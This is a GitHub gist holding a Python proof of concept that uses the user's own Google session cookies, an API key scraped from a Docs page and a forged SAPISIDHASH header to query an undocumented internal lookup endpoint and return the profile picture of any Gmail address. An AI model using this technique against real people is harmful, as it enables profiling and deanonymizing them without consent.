Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save pagpeter/2ad5a0762100d58f98c79129ceb968e6 to your computer and use it in GitHub Desktop.
Save pagpeter/2ad5a0762100d58f98c79129ceb968e6 to your computer and use it in GitHub Desktop.
# PoC of getting the profile picture of any gmail address
# go into developer settings => storage => cookies
# paste cookies
# set EMAIl to email that you want to lookup
# enjoy
import requests
import time
import hashlib
EMAIL = "[email protected]"
cookies = {
"SID": "xxx", # cookie
"APISID": "xxx/xxx", # cookie
"SAPISID": "xxx/xxx", # cookie
"HSID": "xxx", # HTTP only cookie
"SSID": "xxx", # HTTP only cookie
}
def getAPIKey(cookies: dict) -> str:
# Couldn't find anything about this URL.
url = "https://docs.google.com/sharing/driveshare?authuser=0"
# Needed cookies for this request:
# SID, HSID, SSID
# We dont send any more cookies than needed
tmp = dict(cookies) # make a deep copy
del tmp["APISID"]
del tmp["SAPISID"]
r = requests.get(url, cookies=tmp)
try:
# I should really use Regex
return r.text.split("v2internal\\\",\\\"")[1].split("\\")[0]
except:
print("Couldn't get the API key")
print("Response: " + r.text)
print("Error getting API key")
# No apikey - no reason to continue
quit()
def getProfilePic(key: str, cookies: dict, email: str) -> str:
# cookies needed for this request
# SID, HSID, SSID, APISID, SAPISID
# current unix time
ct = str(int(time.time()))
# https://stackoverflow.com/questions/16907352/reverse-engineering-javascript-behind-google-button
sidh = hashlib.sha1(' '.join([ct, cookies["SAPISID"], 'https://docs.google.com']).encode()).hexdigest()
# The request wont work if ANY of these headers dont exist
headers = {
'Authorization': f'SAPISIDHASH {ct}_{sidh}',
'Content-Type': 'application/json+protobuf',
'Origin': 'https://docs.google.com',
'X-Goog-Api-Key': key,
}
# the first value has to be 58
# the second value can be anything, even empty. It has to exist thought
data = f'[58,[],[["{email}"]]]'
# I couldnt find any information on this url
# the only information I found is this:
# https://gist.github.com/avaidyam/acd66c26bc68bf6b89e70374bdc5a5d4
url = "https://peoplestack-pa.clients6.google.com/$rpc/peoplestack.PeopleStackAutocompleteService/Lookup"
r = requests.post(url, headers=headers, cookies=cookies, data=data)
try:
em = r.json()[0][0][1][0][0][0][0][0][0] # wth is google doing with their responses
print(f"[*] Successfully got the profle picture of {EMAIL} ")
print(em)
except:
print(r.text)
print("Error getting pfp")
if __name__ == '__main__':
key = getAPIKey(cookies)
print(f"[*] Successfully got the API key ({key})")
getProfilePic(key, cookies, EMAIL)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment